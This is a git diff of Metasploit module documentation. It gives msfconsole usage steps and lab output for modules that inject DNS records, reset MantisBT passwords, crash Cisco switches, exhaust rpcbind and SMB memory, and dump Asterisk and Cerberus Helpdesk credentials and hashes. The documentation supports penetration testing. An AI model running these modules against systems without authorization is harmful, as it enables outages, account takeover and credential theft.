@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
|
||||||
|
|
||||||
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
|
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular)
|
### 1st generation Google Chromecast (USB stick looking, not circular)
|
||||||
|
|
||||||
```
|
```
|
||||||
msf > auxiliary/admin/chromecast/chromecast_youtube
|
msf > auxiliary/admin/chromecast/chromecast_youtube
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
# Dynamic DNS Update Injection
|
||||||
|
|
||||||
|
`dyn_dns_update` module allows adding or deleting DNS records
|
||||||
|
on a DNS server that allows unrestricted dynamic updates.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Any DNS server that allows dynamic update for none trusted source IPs.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do: ```auxiliary/scanner/dns/dyn_dns_update```
|
||||||
|
3. Do: ```set DOMAIN [IP]```
|
||||||
|
4. Do: ```set NS [IP]```
|
||||||
|
5. Do: ```set INJECTDOMAIN [IP]```
|
||||||
|
6. Do: ```set INJECTIP [IP]```
|
||||||
|
7. Do: ```set ACTION ADD```
|
||||||
|
8. Do: ```run```
|
||||||
|
|
||||||
|
## Actions
|
||||||
|
|
||||||
|
There are two kind of actions the module can run:
|
||||||
|
|
||||||
|
1. **ADD** - Add a new record. [Default]
|
||||||
|
2. **DEL** - Delete an existing record.
|
||||||
|
|
||||||
|
## Targeting Information
|
||||||
|
|
||||||
|
WPAD may not work with Windows 2008+ targets due to a DNS block list: https://technet.microsoft.com/en-us/library/cc995261.aspx
|
|
@ -0,0 +1,30 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
|
||||||
|
on
|
||||||
|
[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install the vulnerable software
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
|
||||||
|
4. Do: ```set rhost```
|
||||||
|
5. Do: ```run```
|
||||||
|
6. If the system is vulnerable, the module should tell you that the password
|
||||||
|
was successfully changed.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/admin/http/mantisbt_password_reset
|
||||||
|
msf auxiliary(mantisbt_password_reset) > set rport 8082
|
||||||
|
rport => 8082
|
||||||
|
msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
|
||||||
|
rhost => 127.0.0.1
|
||||||
|
msf auxiliary(mantisbt_password_reset) > run
|
||||||
|
|
||||||
|
[+] Password successfully changed to 'ndOQTmhQ'.
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(mantisbt_password_reset) >
|
||||||
|
```
|
|
@ -27,7 +27,7 @@
|
||||||
7. You should get credentials
|
7. You should get credentials
|
||||||
|
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
```
|
```
|
||||||
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'
|
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'
|
||||||
|
|
|
@ -28,13 +28,14 @@ Bluetooth HWBridge adapters, depending on the Operating System, may take several
|
||||||
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
|
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
|
||||||
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
|
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
|
||||||
|
|
||||||
1. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
|
1. Most Bluetooth HWBridge adapters, speak serial. So you will need to get the ruby gem "serialport": ```gem install serialport```
|
||||||
2. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
|
2. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
|
||||||
3. Start bluetoothctl: `bluetoothctl`
|
3. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
|
||||||
4. Turn on scanning: `scan on`
|
4. Start bluetoothctl: `bluetoothctl`
|
||||||
5. Turn on agent: `agent on`
|
5. Turn on scanning: `scan on`
|
||||||
6. Make sure we can see OBDII: `devices`
|
6. Turn on agent: `agent on`
|
||||||
7. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
|
7. Make sure we can see OBDII: `devices`
|
||||||
|
8. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
|
||||||
|
|
||||||
```
|
```
|
||||||
Attempting to pair with 00:0D:18:AA:AA:AA
|
Attempting to pair with 00:0D:18:AA:AA:AA
|
||||||
|
|
|
@ -0,0 +1,161 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
1. Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
|
||||||
|
2. Enable telnet access and verify that you can reach the switch normally via that mode.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do: `use auxiliary/dos/cisco/ios_telnet_rocem`
|
||||||
|
3. Do: `set RHOST 192.168.1.10`
|
||||||
|
4. Do: ```run```
|
||||||
|
5. The switch should restart and display crash information on the console.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
Switch#sh ver
|
||||||
|
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
|
||||||
|
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
|
||||||
|
Technical Support: http://www.cisco.com/techsupport
|
||||||
|
Copyright (c) 1986-2010 by Cisco Systems, Inc.
|
||||||
|
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
|
||||||
|
Image text-base: 0x01000000, data-base: 0x02C00000
|
||||||
|
ROM: Bootstrap program is C3750 boot loader
|
||||||
|
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
|
||||||
|
Switch uptime is 1 hour, 28 minutes
|
||||||
|
System returned to ROM by power-on
|
||||||
|
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
|
||||||
|
[...]
|
||||||
|
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
|
||||||
|
Processor board ID CAT1017Z2Z2
|
||||||
|
Last reset from power-on
|
||||||
|
1 Virtual Ethernet interface
|
||||||
|
48 FastEthernet interfaces
|
||||||
|
4 Gigabit Ethernet interfaces
|
||||||
|
The password-recovery mechanism is enabled.
|
||||||
|
[...]
|
||||||
|
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
|
||||||
|
Technical Support: http://www.cisco.com/techsupport
|
||||||
|
Copyright (c) 1986-2015 by Cisco Systems, Inc.
|
||||||
|
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
|
||||||
|
Image text-base: 0x01000000, data-base: 0x02F00000
|
||||||
|
[...]
|
||||||
|
Election Complete
|
||||||
|
Switch 2 booting as Master
|
||||||
|
Waiting for Port download...Complete
|
||||||
|
[...]
|
||||||
|
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
|
||||||
|
Processor board ID CAT1017Z2Z2
|
||||||
|
Last reset from power-on
|
||||||
|
1 Virtual Ethernet interface
|
||||||
|
48 FastEthernet interfaces
|
||||||
|
4 Gigabit Ethernet interfaces
|
||||||
|
The password-recovery mechanism is enabled.
|
||||||
|
[...]
|
||||||
|
Switch Ports Model SW Version SW Image
|
||||||
|
------ ----- ----- ---------- ----------
|
||||||
|
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
|
||||||
|
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
|
||||||
|
Switch#
|
||||||
|
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
|
||||||
|
-Traceback= 41414140
|
||||||
|
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
|
||||||
|
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
|
||||||
|
Buffered messages:
|
||||||
|
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
|
||||||
|
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
|
||||||
|
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
|
||||||
|
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
|
||||||
|
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
|
||||||
|
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
|
||||||
|
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
|
||||||
|
00:00:50: %SYS-5-RESTART: System restarted --
|
||||||
|
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
|
||||||
|
Copyright (c) 1986-2007 by Cisco Systems, Inc.
|
||||||
|
Compiled Fri 20-Jul-07 01:58 by nachen
|
||||||
|
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
|
||||||
|
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
|
||||||
|
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
|
||||||
|
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
|
||||||
|
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
|
||||||
|
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
|
||||||
|
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
|
||||||
|
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
|
||||||
|
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
|
||||||
|
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
|
||||||
|
Queued messages:
|
||||||
|
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
|
||||||
|
Copyright (c) 1986-2007 by Cisco Systems, Inc.
|
||||||
|
Compiled Fri 20-Jul-07 01:58 by nachen
|
||||||
|
Instruction Access Exception (0x0400)!
|
||||||
|
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
|
||||||
|
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
|
||||||
|
CPU Register Context:
|
||||||
|
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
|
||||||
|
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
|
||||||
|
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
|
||||||
|
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
|
||||||
|
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
|
||||||
|
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
|
||||||
|
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
|
||||||
|
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
|
||||||
|
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
|
||||||
|
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
|
||||||
|
Stack trace:
|
||||||
|
PC = 0x41414140, SP = 0x02DDEE80
|
||||||
|
Frame 00: SP = 0x41414141 PC = 0x41414141
|
||||||
|
Switch uptime is 37 minutes, 22 seconds
|
||||||
|
[... rebooting ... ]
|
||||||
|
Switch Ports Model SW Version SW Image
|
||||||
|
------ ----- ----- ---------- ----------
|
||||||
|
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
|
||||||
|
Failed to generate persistent self-signed certificate.
|
||||||
|
Secure server will use temporary self-signed certificate.
|
||||||
|
Press RETURN to get started!
|
||||||
|
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
|
||||||
|
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
|
||||||
|
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
|
||||||
|
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
|
||||||
|
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
|
||||||
|
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
|
||||||
|
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
|
||||||
|
Switch>
|
||||||
|
Switch>as changed to state DOWN
|
||||||
|
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
|
||||||
|
00:00:32: %SYS-5-RESTART: System restarted --
|
||||||
|
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
|
||||||
|
Copyright (c) 1986-2007 by Cisco Systems, Inc.
|
||||||
|
Compiled Fri 20-Jul-07 01:58 by nachen
|
||||||
|
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
|
||||||
|
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
|
||||||
|
Switch>
|
||||||
|
Switch>
|
||||||
|
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
|
||||||
|
00:01:32: %PLATFORM-1-CRASHED:
|
||||||
|
```
|
|
@ -0,0 +1,29 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
|
||||||
|
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
|
||||||
|
|
||||||
|
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
1. Do: `use auxiliary/dos/rpc/rpcbomb`
|
||||||
|
1. Do: `set RHOSTS [IP]`
|
||||||
|
1. Do: `run`
|
||||||
|
1. Target should leak memory
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/dos/rpc/rpcbomb
|
||||||
|
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
|
||||||
|
RHOSTS => 10.0.2.7
|
||||||
|
msf auxiliary(rpcbomb) > run
|
||||||
|
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(rpcbomb) >
|
||||||
|
```
|
|
@ -0,0 +1,43 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
|
||||||
|
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
|
||||||
|
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
|
||||||
|
|
||||||
|
The module opens over 64,000 connections to the target service, so please make sure
|
||||||
|
your system ULIMIT is set appropriately to handle it. A single host running this module
|
||||||
|
can theoretically consume up to 8GB of memory on the target.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Example steps in this format (is also in the PR):
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
1. Do: `use auxiliary/dos/smb/smb_loris`
|
||||||
|
1. Do: `set RHOST [IP]`
|
||||||
|
1. Do: `run`
|
||||||
|
1. Target should allocate increasing amounts of memory.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
###
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
|
||||||
|
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
|
||||||
|
RHOST => 192.168.172.138
|
||||||
|
msf auxiliary(smb_loris) >
|
||||||
|
|
||||||
|
msf auxiliary(smb_loris) > run
|
||||||
|
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
|
||||||
|
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
|
||||||
|
....
|
||||||
|
```
|
|
@ -24,7 +24,7 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
1. Start msfconsole
|
1. Start msfconsole
|
||||||
2. ```use auxiliary/gahter/advantech_webaccess_creds```
|
2. ```use auxiliary/gather/advantech_webaccess_creds```
|
||||||
3. ```set WEBACCESSUSER [USER]```
|
3. ```set WEBACCESSUSER [USER]```
|
||||||
4. ```set WEBACCESSPASS [PASS]```
|
4. ```set WEBACCESSPASS [PASS]```
|
||||||
5. ```run```
|
5. ```run```
|
||||||
|
|
|
@ -0,0 +1,62 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
|
||||||
|
|
||||||
|
Valid manager credentials are required.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
|
||||||
|
|
||||||
|
This module has been tested successfully on:
|
||||||
|
|
||||||
|
* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
|
||||||
|
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
|
||||||
|
|
||||||
|
The following software comes with Asterisk preinstalled and can be used for testing purposes:
|
||||||
|
|
||||||
|
* [FreePBX](https://www.freepbx.org/downloads/)
|
||||||
|
* [VulnVoIP](https://www.rebootuser.com/?p=1069)
|
||||||
|
|
||||||
|
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. Do: `use auxiliary/gather/asterisk_creds`
|
||||||
|
3. Do: `set rhost <RHOST>`
|
||||||
|
4. Do: `set rport <RPORT>` (default: `5038`)
|
||||||
|
5. Do: `set username <USERNAME>` (default: `admin`)
|
||||||
|
6. Do: `set password <PASSWORD>` (default: `amp111`)
|
||||||
|
7. Do: `run`
|
||||||
|
8. You should get credentials
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
|
||||||
|
[+] 172.16.191.229:5038 - Authenticated successfully
|
||||||
|
[*] 172.16.191.229:5038 - Found 9 users
|
||||||
|
|
||||||
|
Asterisk User Credentials
|
||||||
|
=========================
|
||||||
|
|
||||||
|
Username Secret Type
|
||||||
|
-------- ------ ----
|
||||||
|
100 sip
|
||||||
|
103 bbf5d449753391a sip
|
||||||
|
104 273db6cd9ca402f53354 iax2
|
||||||
|
105 secret password sip
|
||||||
|
106 "_" ;) iax2
|
||||||
|
107 123456789 sip
|
||||||
|
108 ~!@#$%^&*()_+{} sip
|
||||||
|
109 antidisestablishment iax2
|
||||||
|
123 y2u.be/VOaZbaPzdsk iax2
|
||||||
|
|
||||||
|
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
|
@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
|
||||||
5: Do: `set CENSYS_DORK rapid7`
|
5: Do: `set CENSYS_DORK rapid7`
|
||||||
6: Do: `run`
|
6: Do: `run`
|
||||||
|
|
||||||
## Sample Output
|
## Scenarios
|
||||||
|
|
||||||
#### Certificates Search
|
### Certificates Search
|
||||||
|
|
||||||
```
|
```
|
||||||
msf auxiliary(censys_search) > set CENSYS_DORK rapid7
|
msf auxiliary(censys_search) > set CENSYS_DORK rapid7
|
||||||
|
|
|
@ -0,0 +1,82 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
|
||||||
|
data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module has been verified against the following Cerberus Helpdesk versions:
|
||||||
|
|
||||||
|
1. Version 4.2.3 Stable (Build 925)
|
||||||
|
2. Version 5.4.4
|
||||||
|
|
||||||
|
However it may also work up to, but not including, version 6.7
|
||||||
|
|
||||||
|
Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
|
||||||
|
|
||||||
|
* of note, 5.4.4 has to be installed on a PRE php7 environment.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
|
||||||
|
3. ```set rhosts [rhosts]```
|
||||||
|
4. ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### 4.2.3 using zend (not verbose)
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
|
||||||
|
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
|
||||||
|
rhosts => 1.1.1.1
|
||||||
|
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
|
||||||
|
|
||||||
|
[-] Invalid response received for 1.1.1.1 for /storage/tmp/devblocks_cache---ch_workers
|
||||||
|
[+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
|
||||||
|
[+] Found: example:112302c209fe8d73f502c132a3da2b1c
|
||||||
|
[+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
|
||||||
|
|
||||||
|
Cerberus Helpdesk User Credentials
|
||||||
|
==================================
|
||||||
|
|
||||||
|
Username Password Hash
|
||||||
|
-------- -------------
|
||||||
|
admin aaa34a6111abf0bd1b1c4d7cd7ebb37b
|
||||||
|
example 112302c209fe8d73f502c132a3da2b1c
|
||||||
|
foobar 0d108d09e5bbe40aade3de5c81e9e9c7
|
||||||
|
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
||||||
|
### 5.4.4 using devblocks
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
|
||||||
|
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
|
||||||
|
rhosts => 192.168.2.45
|
||||||
|
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
|
||||||
|
targeturi => /cerb5/
|
||||||
|
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
|
||||||
|
|
||||||
|
[*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
|
||||||
|
[+] Found: bar@none.com:37b51d194a7513e45b56f6524f2d51f2
|
||||||
|
[+] Found: foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
|
||||||
|
[+] Found: mike@shorebreaksecurity.com:18126e7bd3f84b3f3e4df094def5b7de
|
||||||
|
|
||||||
|
Cerberus Helpdesk User Credentials
|
||||||
|
==================================
|
||||||
|
|
||||||
|
Username Password Hash
|
||||||
|
-------- -------------
|
||||||
|
bar@none.com 37b51d194a7513e45b56f6524f2d51f2
|
||||||
|
foo@none.com acbd18db4cc2f85cedef654fccc4a4d8
|
||||||
|
admin@example.com 18126e7bd3f84b3f3e4df094def5b7de
|
||||||
|
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
|
@ -0,0 +1,87 @@
|
||||||
|
This module downloads PDF files and extracts the author's name from the document metadata.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start `msfconsole`
|
||||||
|
2. Do: `use auxiliary/gather/http_pdf_authors`
|
||||||
|
3. Do: `set URL [URL]`
